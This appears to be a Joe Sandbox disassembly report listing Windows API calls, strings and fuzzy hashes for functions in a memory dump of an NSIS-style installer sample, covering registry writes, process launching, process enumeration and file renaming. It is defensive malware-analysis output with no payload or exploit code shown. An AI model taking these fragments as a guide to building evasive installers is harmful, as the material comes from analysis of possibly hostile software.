Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
N, xrefs: 00404298
F, xrefs: 004042D3

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

plF, xrefs: 00406B54
%s=%s, xrefs: 00406B6F
NUL, xrefs: 00406ACA
[Rename], xrefs: 00406BF4, 00406C03
^F, xrefs: 00406ACF

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
`G, xrefs: 0040246E
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_lem.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

